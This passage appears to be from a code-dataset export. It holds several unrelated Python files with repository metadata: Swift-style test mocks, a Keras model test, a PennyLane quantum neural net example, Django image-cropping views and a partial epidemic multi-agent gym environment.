                counts[metric] = 0
            counts[metric] += 1
        return counts

    def setFormatter(self, obj):
        self.formatter = obj

    def close(self):
        self._clear()

    def set_name(self, name):
        # don't touch _handlers
        self._name = name

    def acquire(self):
        pass

    def release(self):
        pass

    def createLock(self):
        pass

    def emit(self, record):
        pass

    def _handle(self, record):
        try:
            line = record.getMessage()
        except TypeError:
            print('WARNING: unable to format log message %r %% %r' % (
                record.msg, record.args))
            raise
        self.lines_dict[record.levelname.lower()].append(line)

    def handle(self, record):
        self._handle(record)

    def flush(self):
        pass

    def handleError(self, record):
        pass
class DebugLogger(FakeLogger):
    """A simple stdout logging version of FakeLogger"""

    def __init__(self, *args, **kwargs):
        super(DebugLogger, self).__init__(*args, **kwargs)
        self.formatter = logging.Formatter(
            "%(server)s %(levelname)s: %(message)s")

    def handle(self, record):
        # Capture like FakeLogger, then echo the formatted record.
        self._handle(record)
        print(self.formatter.format(record))
class DebugLogAdapter(utils.LogAdapter):
    """LogAdapter that forwards StatsD stubs and unknown attributes to the
    wrapped logger."""

    def _send_to_logger(name):
        # Factory for methods that simply proxy to self.logger.<name>().
        def stub_fn(self, *args, **kwargs):
            return getattr(self.logger, name)(*args, **kwargs)
        return stub_fn

    # delegate to FakeLogger's mocks
    update_stats = _send_to_logger('update_stats')
    increment = _send_to_logger('increment')
    decrement = _send_to_logger('decrement')
    timing = _send_to_logger('timing')
    timing_since = _send_to_logger('timing_since')
    transfer_rate = _send_to_logger('transfer_rate')
    set_statsd_prefix = _send_to_logger('set_statsd_prefix')

    def __getattribute__(self, name):
        # Fall back to the wrapped logger for anything the adapter itself
        # does not define.
        try:
            return object.__getattribute__(self, name)
        except AttributeError:
            return getattr(self.__dict__['logger'], name)
def debug_logger(name='test'):
    """get a named adapted debug logger"""
    logger = DebugLogger()
    return DebugLogAdapter(logger, name)
# Keep a reference so fake_syslog_handler can copy its attributes.
original_syslog_handler = logging.handlers.SysLogHandler


def fake_syslog_handler():
    """Replace SysLogHandler with FakeLogger, copying its LOG_* constants
    and priority_map so code that references them keeps working."""
    for attr in dir(original_syslog_handler):
        if attr.startswith('LOG'):
            setattr(FakeLogger, attr,
                    copy.copy(getattr(logging.handlers.SysLogHandler, attr)))
    FakeLogger.priority_map = \
        copy.deepcopy(logging.handlers.SysLogHandler.priority_map)

    logging.handlers.SysLogHandler = FakeLogger
# Opt-in via the unit_test config: swap in the fake syslog handler so
# tests never write to the real syslog.
if utils.config_true_value(
        get_config('unit_test').get('fake_syslog', 'False')):
    fake_syslog_handler()
class MockTrue(object):
    """
    Instances of MockTrue evaluate like True.

    Any attribute access, and any call, on an instance of MockTrue returns
    the same MockTrue instance, so arbitrarily long chains still compare
    equal to True.

    >>> thing = MockTrue()
    >>> thing
    True
    >>> thing == True
    True
    >>> thing != True
    False
    >>> thing.attribute.method().attribute
    True
    """

    def __getattribute__(self, *args, **kwargs):
        return self

    def __call__(self, *args, **kwargs):
        return self

    def __repr__(*args, **kwargs):
        return repr(True)

    def __eq__(self, other):
        return other is True

    def __ne__(self, other):
        return other is not True
@contextmanager
def mock(update):
    """Temporarily set dotted-path attributes from *update*, restoring
    (or deleting newly-added ones) on exit."""
    restore = []
    remove = []
    for dotted, replacement in update.items():
        parts = dotted.split('.')
        attr = parts.pop()
        target = __import__(parts[0], fromlist=parts[1:])
        for name in parts[1:]:
            target = getattr(target, name)
        if hasattr(target, attr):
            restore.append((target, attr, getattr(target, attr)))
        else:
            # Attribute did not exist before; delete it afterwards.
            remove.append((target, attr))
        setattr(target, attr, replacement)
    try:
        yield True
    finally:
        for target, attr, old_value in restore:
            setattr(target, attr, old_value)
        for target, attr in remove:
            delattr(target, attr)
class FakeStatus(object):
    """
    This will work with our fake_http_connect, if you hand in one of these
    instead of a status int or status int tuple to the "codes" iter you can
    add some eventlet sleep to the expect and response stages of the
    connection.
    """

    def __init__(self, status, expect_sleep=None, response_sleep=None):
        """
        :param status: the response status int, or a tuple of
                       ([expect_status, ...], response_status)
        :param expect_sleep: float, time to eventlet sleep during expect, can
                             be a iter of floats
        :param response_sleep: float, time to eventlet sleep during response
        """
        # connect exception
        if isinstance(status, (Exception, eventlet.Timeout)):
            raise status
        if isinstance(status, tuple):
            # Explicit expect statuses followed by the final response status.
            self.expect_status = list(status[:-1])
            self.status = status[-1]
            self.explicit_expect_list = True
        else:
            self.expect_status, self.status = ([], status)
            self.explicit_expect_list = False
        if not self.expect_status:
            # when a swift backend service returns a status before reading
            # from the body (mostly an error response) eventlet.wsgi will
            # respond with that status line immediately instead of 100
            # Continue, even if the client sent the Expect 100 header.
            # BufferedHttp and the proxy both see these error statuses
            # when they call getexpect, so our FakeConn tries to act like
            # our backend services and return certain types of responses
            # as expect statuses just like a real backend server would do.
            if self.status in (507, 412, 409):
                self.expect_status = [status]
            else:
                self.expect_status = [100, 100]

        # setup sleep attributes — pad the sleep list so there is one
        # (possibly None) entry per expect status.
        if not isinstance(expect_sleep, (list, tuple)):
            expect_sleep = [expect_sleep] * len(self.expect_status)
        self.expect_sleep_list = list(expect_sleep)
        while len(self.expect_sleep_list) < len(self.expect_status):
            self.expect_sleep_list.append(None)
        self.response_sleep = response_sleep

    def get_response_status(self):
        # Optional delay, then verify explicit expect statuses were all
        # consumed before the final response is fetched.
        if self.response_sleep is not None:
            eventlet.sleep(self.response_sleep)
        if self.expect_status and self.explicit_expect_list:
            raise Exception('Test did not consume all fake '
                            'expect status: %r' % (self.expect_status,))
        if isinstance(self.status, (Exception, eventlet.Timeout)):
            raise self.status
        return self.status

    def get_expect_status(self):
        # Pop one sleep and one status per getexpect call; a status that is
        # an exception instance is raised instead of returned.
        expect_sleep = self.expect_sleep_list.pop(0)
        if expect_sleep is not None:
            eventlet.sleep(expect_sleep)
        expect_status = self.expect_status.pop(0)
        if isinstance(expect_status, (Exception, eventlet.Timeout)):
            raise expect_status
        return expect_status
class SlowBody(object):
    """
    This will work with our fake_http_connect, if you hand in these
    instead of strings it will make reads take longer by the given
    amount. It should be a little bit easier to extend than the
    current slow kwarg - which inserts whitespace in the response.
    Also it should be easy to detect if you have one of these (or a
    subclass) for the body inside of FakeConn if we wanted to do
    something smarter than just duck-type the str/buffer api
    enough to get by.
    """

    def __init__(self, body, slowness):
        self.body = body
        self.slowness = slowness

    def __len__(self):
        return len(self.body)

    def __getitem__(self, key):
        # Slicing keeps the slowness so partial reads stay slow too.
        return SlowBody(self.body[key], self.slowness)

    def __radd__(self, other):
        self.slowdown()
        return other + self.body

    def slowdown(self):
        eventlet.sleep(self.slowness)
def fake_http_connect(*code_iter, **kwargs):
    """Return a fake ``http_connect`` replacement.

    Each call to the returned ``connect`` consumes one status from
    *code_iter* (plus matching etags/headers/timestamps kwargs, when
    given) and returns a FakeConn that plays back that response.
    """

    class FakeConn(object):

        def __init__(self, status, etag=None, body='', timestamp='1',
                     headers=None, expect_headers=None, connection_id=None,
                     give_send=None):
            if not isinstance(status, FakeStatus):
                status = FakeStatus(status)
            self._status = status
            self.reason = 'Fake'
            self.host = '1.2.3.4'
            self.port = '1234'
            self.sent = 0
            self.received = 0
            self.etag = etag
            self.body = body
            self.headers = headers or {}
            self.expect_headers = expect_headers or {}
            self.timestamp = timestamp
            self.connection_id = connection_id
            self.give_send = give_send
            # A list-valued 'slow' kwarg is a per-connection schedule;
            # each connection pops its own sleep value.
            if 'slow' in kwargs and isinstance(kwargs['slow'], list):
                try:
                    self._next_sleep = kwargs['slow'].pop(0)
                except IndexError:
                    self._next_sleep = None
            # be nice to trixy bits with node_iter's
            eventlet.sleep()

        def getresponse(self):
            exc = kwargs.get('raise_exc')
            if exc:
                if isinstance(exc, (Exception, eventlet.Timeout)):
                    raise exc
                raise Exception('test')
            if kwargs.get('raise_timeout_exc'):
                raise eventlet.Timeout()
            self.status = self._status.get_response_status()
            return self

        def getexpect(self):
            expect_status = self._status.get_expect_status()
            headers = dict(self.expect_headers)
            if expect_status == 409:
                headers['X-Backend-Timestamp'] = self.timestamp
            response = FakeConn(expect_status,
                                timestamp=self.timestamp,
                                headers=headers)
            response.status = expect_status
            return response

        def getheaders(self):
            etag = self.etag
            if not etag:
                if isinstance(self.body, str):
                    etag = '"' + md5(self.body).hexdigest() + '"'
                else:
                    # fixed etag for non-str bodies
                    etag = '"68b329da9893e34099c7d8ad5cb9c940"'

            headers = swob.HeaderKeyDict({
                'content-length': len(self.body),
                'content-type': 'x-application/test',
                'x-timestamp': self.timestamp,
                'x-backend-timestamp': self.timestamp,
                'last-modified': self.timestamp,
                'x-object-meta-test': 'testing',
                'x-delete-at': '9876543210',
                'etag': etag,
                'x-works': 'yes',
            })
            if self.status // 100 == 2:
                headers['x-account-container-count'] = \
                    kwargs.get('count', 12345)
            if not self.timestamp:
                # when timestamp is None, HeaderKeyDict raises KeyError
                headers.pop('x-timestamp', None)
            try:
                if next(container_ts_iter) is False:
                    headers['x-container-timestamp'] = '1'
            except StopIteration:
                pass
            am_slow, value = self.get_slow()
            if am_slow:
                headers['content-length'] = '4'
            headers.update(self.headers)
            return headers.items()

        def get_slow(self):
            # Returns (is_slow, sleep_seconds) for this connection.
            if 'slow' in kwargs and isinstance(kwargs['slow'], list):
                if self._next_sleep is not None:
                    return True, self._next_sleep
                else:
                    return False, 0.01
            if kwargs.get('slow') and isinstance(kwargs['slow'], Number):
                return True, kwargs['slow']
            return bool(kwargs.get('slow')), 0.1

        def read(self, amt=None):
            am_slow, value = self.get_slow()
            if am_slow:
                if self.sent < 4:
                    self.sent += 1
                    eventlet.sleep(value)
                    return ' '
            rv = self.body[:amt]
            self.body = self.body[amt:]
            return rv

        def send(self, amt=None):
            if self.give_send:
                self.give_send(self.connection_id, amt)
            am_slow, value = self.get_slow()
            if am_slow:
                if self.received < 4:
                    self.received += 1
                    eventlet.sleep(value)

        def getheader(self, name, default=None):
            return swob.HeaderKeyDict(self.getheaders()).get(name, default)

        def close(self):
            pass

    # Per-connection playback iterators, padded to one entry per status.
    timestamps_iter = iter(kwargs.get('timestamps') or ['1'] * len(code_iter))
    etag_iter = iter(kwargs.get('etags') or [None] * len(code_iter))
    if isinstance(kwargs.get('headers'), (list, tuple)):
        headers_iter = iter(kwargs['headers'])
    else:
        headers_iter = iter([kwargs.get('headers', {})] * len(code_iter))
    if isinstance(kwargs.get('expect_headers'), (list, tuple)):
        expect_headers_iter = iter(kwargs['expect_headers'])
    else:
        expect_headers_iter = iter([kwargs.get('expect_headers', {})] *
                                   len(code_iter))

    x = kwargs.get('missing_container', [False] * len(code_iter))
    if not isinstance(x, (tuple, list)):
        x = [x] * len(code_iter)
    container_ts_iter = iter(x)
    code_iter = iter(code_iter)
    conn_id_and_code_iter = enumerate(code_iter)
    static_body = kwargs.get('body', None)
    body_iter = kwargs.get('body_iter', None)
    if body_iter:
        body_iter = iter(body_iter)

    def connect(*args, **ckwargs):
        if kwargs.get('slow_connect', False):
            eventlet.sleep(0.1)
        if 'give_content_type' in kwargs:
            # args[6] is the request headers dict, when present.
            if len(args) >= 7 and 'Content-Type' in args[6]:
                kwargs['give_content_type'](args[6]['Content-Type'])
            else:
                kwargs['give_content_type']('')
        i, status = next(conn_id_and_code_iter)
        if 'give_connect' in kwargs:
            give_conn_fn = kwargs['give_connect']
            # Only pass connection_id if the callback can accept it.
            argspec = inspect.getargspec(give_conn_fn)
            if argspec.keywords or 'connection_id' in argspec.args:
                ckwargs['connection_id'] = i
            give_conn_fn(*args, **ckwargs)
        etag = next(etag_iter)
        headers = next(headers_iter)
        expect_headers = next(expect_headers_iter)
        timestamp = next(timestamps_iter)

        if status <= 0:
            raise HTTPException()
        if body_iter is None:
            body = static_body or ''
        else:
            body = next(body_iter)
        return FakeConn(status, etag, body=body, timestamp=timestamp,
                        headers=headers, expect_headers=expect_headers,
                        connection_id=i, give_send=kwargs.get('give_send'))

    # Exposed so callers can assert every status was consumed.
    connect.code_iter = code_iter

    return connect
@contextmanager
def mocked_http_conn(*args, **kwargs):
    """Patch bufferedhttp's http_connect_raw with a fake_http_connect,
    capturing each request dict on ``fake_conn.requests``."""
    captured = []

    def record_request(ip, port, method, path, headers, qs, ssl):
        captured.append({
            'ip': ip,
            'port': port,
            'method': method,
            'path': path,
            'headers': headers,
            'qs': qs,
            'ssl': ssl,
        })

    kwargs.setdefault('give_connect', record_request)
    fake_conn = fake_http_connect(*args, **kwargs)
    fake_conn.requests = captured
    with mocklib.patch('swift.common.bufferedhttp.http_connect_raw',
                       new=fake_conn):
        yield fake_conn
    leftovers = list(fake_conn.code_iter)
    if leftovers:
        raise AssertionError('left over status %r' % leftovers)
def make_timestamp_iter():
    """Return an iterator of monotonically increasing Timestamps,
    starting from the current whole second."""
    return (Timestamp(t) for t in itertools.count(int(time.time())))
| 32.14786
| 79
| 0.593682
|
4a07e214da6559f1f21091fb34de43b34c2eb016
| 1,201
|
py
|
Python
|
tests/models/test_model.py
|
yecharlie/convnet3d
|
0b2771eec149b196ef59b58d09eef71c9b201d40
|
[
"MIT"
] | 6
|
2020-03-12T10:28:41.000Z
|
2021-11-18T16:17:20.000Z
|
tests/models/test_model.py
|
yecharlie/convnet3d
|
0b2771eec149b196ef59b58d09eef71c9b201d40
|
[
"MIT"
] | null | null | null |
tests/models/test_model.py
|
yecharlie/convnet3d
|
0b2771eec149b196ef59b58d09eef71c9b201d40
|
[
"MIT"
] | 1
|
2019-08-01T02:50:05.000Z
|
2019-08-01T02:50:05.000Z
|
import keras
import pytest
from convnet3d.models import (
reductionModel,
submodels,
convnet3dModel
)
class TestReductionModel(object):
def test_TimeDistributed(self):
with pytest.raises(TypeError) :
roi_input = keras.layers.Input(shape=(10, 25, 60, 60, 1))
fpr_model = reductionModel()
outputs = keras.layers.TimeDistributed(fpr_model)(roi_input)
model = keras.models.Model(inputs=roi_input, outputs=outputs)
model.summary()
def test_inputs_outputs(self):
fpr_model = reductionModel()
assert isinstance(fpr_model.inputs, list)
assert isinstance(fpr_model.outputs, list)
def test_TimeDistributed_with_submodels(self):
roi_input = keras.layers.Input(shape=(10, 25, 60, 60, 1))
fpr_model = reductionModel()
sub_models = submodels(fpr_model)
sub_models_outputs = [keras.layers.TimeDistributed(subm)(roi_input) for subm in sub_models]
model = keras.models.Model(inputs=roi_input, outputs=sub_models_outputs)
model.summary()
class TestConvnet3dModel(object):
def test_simple(self):
model = convnet3dModel() # noqa: F841
| 32.459459
| 99
| 0.679434
|
4a07e3151369586ee287d1e30f50749534a9506b
| 2,599
|
py
|
Python
|
examples/CV2_quantum-neural-net.py
|
AroosaIjaz/Mypennylane
|
40f2219b5e048d4bd93df815811ca5ed3f5327fa
|
[
"Apache-2.0"
] | 1
|
2019-05-12T22:43:42.000Z
|
2019-05-12T22:43:42.000Z
|
examples/CV2_quantum-neural-net.py
|
shashanka300/pennylane
|
194ccd00a9a7f7075c37680c970e56bab4808e60
|
[
"Apache-2.0"
] | null | null | null |
examples/CV2_quantum-neural-net.py
|
shashanka300/pennylane
|
194ccd00a9a7f7075c37680c970e56bab4808e60
|
[
"Apache-2.0"
] | 1
|
2022-03-04T02:17:11.000Z
|
2022-03-04T02:17:11.000Z
|
"""Continuous-variable quantum neural network example.
In this demo we implement the photonic quantum neural net model
from Killoran et al. (arXiv:1806.06871) with the example
of function fitting.
"""
import pennylane as qml
from pennylane import numpy as np
from pennylane.optimize import AdamOptimizer
try:
    dev = qml.device('strawberryfields.fock', wires=1, cutoff_dim=10)
except Exception:
    # BUG FIX: was a bare ``except:``, which also swallowed SystemExit
    # and KeyboardInterrupt; catch Exception instead.
    print("To run this demo you need to install the strawberryfields plugin...")
def layer(v):
    """ Single layer of the quantum neural net.

    Args:
        v (array[float]): array of variables for one layer
    """
    # Matrix multiplication of input layer
    # (rotation-squeeze-rotation acts as the linear weight, per the
    # model of arXiv:1806.06871 cited in the module docstring)
    qml.Rotation(v[0], wires=0)
    qml.Squeezing(v[1], 0., wires=0)
    qml.Rotation(v[2], wires=0)

    # Bias
    qml.Displacement(v[3], 0., wires=0)

    # Element-wise nonlinear transformation
    qml.Kerr(v[4], wires=0)
@qml.qnode(dev)
def quantum_neural_net(var, x=None):
    """The quantum neural net variational circuit.

    Args:
        var (array[float]): array of variables, one row per layer
        x (array[float]): single input vector

    Returns:
        float: expectation of Homodyne measurement on Mode 0
    """
    # Encode input x into quantum state
    qml.Displacement(x, 0., wires=0)

    # "layer" subcircuits
    for v in var:
        layer(v)

    # NOTE(review): qml.expval.X is the pre-0.6 PennyLane measurement
    # API; newer releases use qml.expval(qml.X(0)).
    return qml.expval.X(0)
def square_loss(labels, predictions):
    """Mean squared error between *labels* and *predictions*.

    Args:
        labels (array[float]): 1-d array of labels
        predictions (array[float]): 1-d array of predictions

    Returns:
        float: square loss
    """
    total = 0
    for target, guess in zip(labels, predictions):
        total = total + (target - guess) ** 2
    return total / len(labels)
def cost(var, features, labels):
    """Cost function to be minimized: MSE of circuit predictions.

    Args:
        var (array[float]): array of variables
        features (array[float]): 2-d array of input vectors
        labels (array[float]): 1-d array of targets

    Returns:
        float: loss
    """
    # One circuit evaluation per input in the data batch.
    predictions = [quantum_neural_net(var, x=sample) for sample in features]
    return square_loss(labels, predictions)
# load function data
data = np.loadtxt("data/sine.txt")
X = data[:, 0]  # first column: inputs
Y = data[:, 1]  # second column: targets

# initialize weights
np.random.seed(0)  # fixed seed for reproducibility
num_layers = 4
var_init = 0.05 * np.random.randn(num_layers, 5)  # 5 parameters per layer

# create optimizer
opt = AdamOptimizer(0.01, beta1=0.9, beta2=0.999)

# train
var = var_init
for it in range(500):
    var = opt.step(lambda v: cost(v, X, Y), var)
    # NOTE(review): cost is re-evaluated here just for logging, doubling
    # the circuit evaluations per iteration.
    print("Iter: {:5d} | Cost: {:0.7f} ".format(it + 1, cost(var, X, Y)))
| 23.414414
| 80
| 0.643324
|
4a07e3654c70c74eac4bf358a32f3b3bb49e3d31
| 2,993
|
py
|
Python
|
scripts/views.py
|
sul-cidr/scriptchart-backend
|
38bb4139d77d683d85f31839a1a06096fe2fabbc
|
[
"MIT"
] | 1
|
2019-06-05T23:05:32.000Z
|
2019-06-05T23:05:32.000Z
|
scripts/views.py
|
sul-cidr/scriptchart-backend
|
38bb4139d77d683d85f31839a1a06096fe2fabbc
|
[
"MIT"
] | 42
|
2019-01-24T23:51:42.000Z
|
2021-09-08T01:04:45.000Z
|
scripts/views.py
|
sul-cidr/scriptchart-backend
|
38bb4139d77d683d85f31839a1a06096fe2fabbc
|
[
"MIT"
] | 1
|
2019-08-05T12:47:57.000Z
|
2019-08-05T12:47:57.000Z
|
import pathlib
import requests
from io import BytesIO
from django.conf import settings
from django.http import HttpResponse
from rest_framework import generics
from PIL import Image
from scripts.models import Manuscript, Page, Coordinates
from scripts.serializers import (
ManuscriptSerializer, PageSerializer, CoordinatesSerializer)
class LetterImage(generics.ListAPIView):
    """Serve a cropped PNG region of a manuscript page image.

    Query params: ``page_url`` plus the crop box ``x``/``y``/``w``/``h``.
    Prefers a local copy under settings.IMAGES_ROOT; falls back to
    fetching the remote URL.
    """

    def get(self, request, format=None):
        params = self.request.GET
        page_url = params.get('page_url')
        x = int(params.get('x', 0))
        y = int(params.get('y', 0))
        w = int(params.get('w', 0))
        h = int(params.get('h', 0))

        local_path = None
        if settings.IMAGES_ROOT is not None:
            relative = page_url.replace(
                'https://images.syriac.reclaim.hosting/', '')
            local_path = pathlib.Path(settings.IMAGES_ROOT) / relative

        if local_path and local_path.exists():
            image = Image.open(local_path)
        else:
            remote = requests.get(page_url, verify=True)
            image = Image.open(BytesIO(remote.content))

        cropped = image.crop([x, y, x + w, y + h])

        response = HttpResponse(content_type="image/png")
        cropped.save(response, "PNG")
        response['Content-Length'] = len(response.content)
        return response
class ManuscriptList(generics.ListAPIView):
    """List manuscripts; ``?display=...`` hides those flagged display=False."""
    serializer_class = ManuscriptSerializer

    def get_queryset(self):
        qs = Manuscript.objects.all()
        if self.request.query_params.get('display', None) is not None:
            qs = qs.exclude(display=False)
        return qs
class ManuscriptDetail(generics.RetrieveAPIView):
    """Retrieve a single Manuscript by primary key."""
    queryset = Manuscript.objects.all()
    serializer_class = ManuscriptSerializer
class PageList(generics.ListAPIView):
    """List pages, optionally filtered by ``?manuscript_id=``."""
    serializer_class = PageSerializer

    def get_queryset(self):
        qs = Page.objects.all()
        manuscript_id = self.request.query_params.get('manuscript_id', None)
        if manuscript_id is not None:
            qs = qs.filter(manuscript_id=manuscript_id)
        return qs
class PageDetail(generics.RetrieveAPIView):
    """Retrieve a single Page by primary key."""
    queryset = Page.objects.all()
    serializer_class = PageSerializer
class CoordinatesList(generics.ListAPIView):
    """List letter coordinates, filterable by ``?page_id=`` / ``?letter_id=``."""
    serializer_class = CoordinatesSerializer

    def get_queryset(self):
        qs = Coordinates.objects.all()
        params = self.request.query_params
        page_id = params.get('page_id', None)
        if page_id is not None:
            qs = qs.filter(page_id=page_id)
        letter_id = params.get('letter_id', None)
        if letter_id is not None:
            qs = qs.filter(letter_id=letter_id)
        return qs
class CoordinatesDetail(generics.RetrieveAPIView):
    """Retrieve a single Coordinates record by primary key."""
    queryset = Coordinates.objects.all()
    serializer_class = CoordinatesSerializer
| 31.840426
| 76
| 0.683261
|
4a07e3b2f1fba58965908d71d6306afa3a4d15e3
| 227
|
py
|
Python
|
tests/__init__.py
|
idealist/Alfajor
|
340ed875fd36a2b4aab0caba686dd189cc43f5bd
|
[
"BSD-3-Clause"
] | 2
|
2015-11-01T22:29:54.000Z
|
2018-02-15T15:54:30.000Z
|
tests/__init__.py
|
jek/alfajor
|
867f66ea1a9306fe24a0498215d2c9b83d43188d
|
[
"BSD-3-Clause"
] | 1
|
2015-10-14T08:02:50.000Z
|
2020-04-26T06:18:48.000Z
|
tests/__init__.py
|
idealist/Alfajor
|
340ed875fd36a2b4aab0caba686dd189cc43f5bd
|
[
"BSD-3-Clause"
] | 3
|
2015-09-16T14:31:23.000Z
|
2020-09-08T06:34:12.000Z
|
# Copyright Action Without Borders, Inc., the Alfajor authors and contributors.
# All rights reserved. See AUTHORS.
#
# This file is part of 'alfajor' and is distributed under the BSD license.
# See LICENSE for more details.
| 32.428571
| 79
| 0.757709
|
4a07e441bf3a004bd2a8796ba5df82c34106dff7
| 8,859
|
py
|
Python
|
envs/EpidemicMultiEnv.py
|
covidmulator/EpidemicEnv
|
d9caf28d2636c1c852cb01e669a038d7a466fc3e
|
[
"MIT"
] | 4
|
2020-10-29T14:47:15.000Z
|
2021-11-17T13:51:13.000Z
|
envs/EpidemicMultiEnv.py
|
covidmulator/EpidemicEnv
|
d9caf28d2636c1c852cb01e669a038d7a466fc3e
|
[
"MIT"
] | 1
|
2020-10-10T16:44:08.000Z
|
2020-10-19T06:07:03.000Z
|
envs/EpidemicMultiEnv.py
|
covidmulator/EpidemicEnv
|
d9caf28d2636c1c852cb01e669a038d7a466fc3e
|
[
"MIT"
] | 1
|
2020-10-29T12:25:29.000Z
|
2020-10-29T12:25:29.000Z
|
import gym
import numpy as np
from gym import spaces
from sklearn.preprocessing import MinMaxScaler
from random import choice, randint, random
from typing import List, Tuple
# Cell-state encoding used in the agent grid / Q-table lookups.
# (Storing per-agent attributes on an entity object is a possible refinement.)
EMPTY = 0
COMMON = 2
VIRUS = 1
ISOLATION = 3

# 15x15 grids, initially all empty (each row is a distinct list).
AGENT_MATRIX = [[0] * 15 for _ in range(15)]

REWARD_MATRIX = [[0] * 15 for _ in range(15)]
class EpidemicMultiEnv(gym.Env):
    """Multi-agent epidemic simulation on a 15x15 grid.

    Each agent walks toward a random destination while virus status spreads
    by adjacency; agents learn with per-agent tabular Q-learning.
    """

    def __init__(self, env_config):
        # env_config: {"agent_num": int, "population": 2-D data accepted by
        # MinMaxScaler} -- assumed shape; TODO confirm against caller.
        agent_matrix = AGENT_MATRIX
        reward_matrix = REWARD_MATRIX
        self.agent_num = env_config["agent_num"]
        self.action_length = 4
        self.state_length = 15 * 15
        # NOTE(review): the trailing comma makes this a 1-tuple containing the
        # Box, not a Box -- probably unintended; confirm before relying on it.
        self.action_space = spaces.Box(low=-1.0,high=4.0,shape=(15,15),dtype=np.float32),
        self.observation_space = spaces.Box(low=-1.0, high=4.0,shape=(15,15),dtype=np.float32)
        self.population = self.min_max_norm(env_config["population"])
        Q = np.zeros([15, 15])
        self.agent_matrix = agent_matrix = np.array(agent_matrix).astype(int)
        self.nrow, self.ncol = nrow, ncol = self.agent_matrix.shape
        self.reward_range = (-1, 1)
        self.agents = self.get_position()
        self.has_virus = self.get_virus()
        self.episode = 0
        self.destinations = self.get_position()
        self.steps = [0 for _ in range(env_config["agent_num"])]
        # NOTE(review): get_reward_matrix mutates its argument in place, so the
        # module-level REWARD_MATRIX accumulates values across instances.
        self.reward_matrix = self.get_reward_matrix(reward_matrix)
        # NOTE(review): every entry aliases the same Q array, so all agents
        # share one Q-table -- confirm whether per-agent tables were intended.
        self.Q_list = [Q for _ in range(env_config["agent_num"])]
        self.lr = .8            # Q-learning rate
        self.y = .95            # discount factor
        self.epsilon = .9       # exploration rate (decays with episode)
        self.s = [self.encode_state(i) for i in range(self.agent_num)]
        self.reward_arr = [0 for _ in range(env_config["agent_num"])]
        self.reward_all_arr = [0 for _ in range(env_config["agent_num"])]

    def min_max_norm(self, lst: list) -> list:
        """Scale `lst` column-wise into [-1, 1] with sklearn's MinMaxScaler."""
        scaler = MinMaxScaler(feature_range=(-1, 1))
        scaler.fit(lst)
        lst_norm = scaler.transform(lst)
        return lst_norm

    def get_reward_matrix(self, matrix: list) -> list:
        """Write the current episode's population values into six fixed cells.

        NOTE(review): `matrix_result = matrix` aliases, so the caller's matrix
        is modified in place.
        """
        matrix_result = matrix
        e = self.episode
        matrix_result[2][9] = self.population[0][e]
        matrix_result[11][4] = self.population[1][e]
        matrix_result[9][4] = self.population[2][e]
        matrix_result[7][4] = self.population[3][e]
        matrix_result[9][9] = self.population[4][e]
        matrix_result[3][4] = self.population[5][e]
        return matrix_result

    def get_position(self) -> list:
        """Pick `agent_num` distinct random [x, y] cells on the grid."""
        num_x = list(range(0, self.ncol))
        num_y = list(range(0, self.nrow))
        positions = list()
        positions_return = list()
        for x in num_x:
            for y in num_y:
                positions.append([x, y])
        for _ in range(self.agent_num):
            selected = choice(positions)
            positions_return.append(selected)
            # remove the chosen cell so positions are unique
            positions.pop(positions.index(selected))
        return positions_return

    def get_virus(self) -> list:
        """Infect one random agent, mark its cell VIRUS, return infection flags."""
        index = randint(0, self.agent_num - 1)
        virus_return = [False for _ in range(self.agent_num)]
        virus_return[index] = True
        x, y = self.agents[index]
        self.agent_matrix[x][y] = VIRUS
        return virus_return

    def get_target(self, direction: int, index: int) -> Tuple[int, int]:
        """Cell reached by agent `index` taking one step in `direction` (0-3)."""
        delta_x = [0, 0, -1, 1]
        delta_y = [-1, 1, 0, 0]
        agent_x = self.agents[index][0]
        agent_y = self.agents[index][1]
        return agent_x + delta_x[direction], agent_y + delta_y[direction]

    def is_virus_around(self, index: int) -> bool:
        """True if a VIRUS cell is adjacent; side effect: marks agent infected."""
        result = False
        x = self.agents[index][0]
        y = self.agents[index][1]
        for action in range(4):
            if(self.is_move_correct(action, index)):
                around_x, around_y = self.get_target(action, index)
                if(self.agent_matrix[around_x][around_y] == VIRUS):
                    self.has_virus[self.agents.index([x, y])] = True
                    result = True
        return result

    def is_move_correct(self, action: int, index: int) -> bool:
        """Whether `action` is a direction that keeps the agent on the grid.

        NOTE(review): action 0 is always rejected by `0 < action < 4`, and the
        upper bounds use `nrow - 1` / `ncol - 1` -- confirm both are intended.
        """
        if(0 < action < 4):
            agent_x, agent_y = self.get_target(action, index)
            return (0 <= agent_x < self.nrow - 1) and (0 <= agent_y < self.ncol - 1)
        return False

    def encode_state(self, index: int) -> int:
        """Cell code (EMPTY/VIRUS/COMMON/ISOLATION) under agent `index`."""
        x = self.agents[index][0]
        y = self.agents[index][1]
        return self.agent_matrix[x][y]

    def move_link(self, x: int, y: int, index: int, status: int) -> None:
        """Move agent `index` to (x, y): write `status` there, clear old cell."""
        agent_x = self.agents[index][0]
        agent_y = self.agents[index][1]
        self.agent_matrix[x][y] = status
        self.agent_matrix[agent_x][agent_y] = 0
        self.agents[index][0] = x
        self.agents[index][1] = y

    def move(self, direction: int, index: int) -> Tuple[float, bool]:
        """Apply one movement; return (reward, reached_destination)."""
        agent_x = self.agents[index][0]
        agent_y = self.agents[index][1]
        status = COMMON
        self.steps[index] += 1
        if(self.is_virus_around(index)):
            # infected agents carry VIRUS status and don't count the step
            status = VIRUS
            self.steps[index] -= 1
        x, y = self.get_target(direction, index)
        object_in_direction = int(self.agent_matrix[x][y])
        reward_return = 0
        is_end = False
        if x == self.destinations[index][0] and y == self.destinations[index][1]:
            status = EMPTY
            is_end = True
        elif object_in_direction == EMPTY:
            self.move_link(x, y, index, status)
            reward_return = .5
        elif object_in_direction == VIRUS:
            self.move_link(x, y, index, status)
            reward_return = -.1
        elif object_in_direction == COMMON:
            self.move_link(x, y, index, status)
            reward_return = -.1
        elif object_in_direction == ISOLATION:
            self.move_link(x, y, index, status)
            reward_return = -.1
        # add the location-based reward of the cell the agent started on
        reward_return += self.reward_matrix[agent_x][agent_y]
        return reward_return, is_end

    def choose_action(self):
        """Epsilon-greedy action per agent (exploration decays with episode).

        NOTE(review): the random branch samples 0..14 although only 1-3 pass
        is_move_correct -- out-of-range actions are later penalized as invalid.
        """
        actions = list()
        for index in range(self.agent_num):
            if (random() < (self.epsilon / np.log(self.episode + 2))):
                a = randint(0, 15 - 1)
            else:
                # greedy pick over the agent's Q row, with decaying noise
                a = np.argmax(self.Q_list[index][self.s,:][index] + np.random.randn(1, 15) * (1. / (self.episode + 1)))
            actions.append(a)
        return actions

    def action(self, actions) -> Tuple[list, list, list, dict]:
